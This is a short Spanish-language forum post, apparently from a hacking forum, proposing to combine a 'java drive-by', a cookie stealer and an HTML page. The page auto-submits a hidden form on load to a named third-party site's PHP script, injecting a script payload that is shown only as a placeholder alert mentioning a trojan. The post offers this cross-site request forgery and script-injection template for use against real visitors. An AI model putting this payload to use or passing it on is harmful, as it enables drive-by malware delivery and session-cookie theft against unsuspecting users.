mira aca otra idea de lo que se podria hacer con un java drive by
https://www.youtube.com/watch?v=BBj5JQAigQI
bastaria con meter este html en cualquier hosting por ejemplo + un java drive+ un cookies stealer a ver que tal XD
Código
<html> <head> </head> <body onload="javascript:document.form1.submit();"> <form method=post action="http://www.tecasystem.com/prueba2.php" name="form1"> <input type=hidden name="texto" value="<script>alert(/soy un java drive con un troyano :D/)</script>"> </body> </html>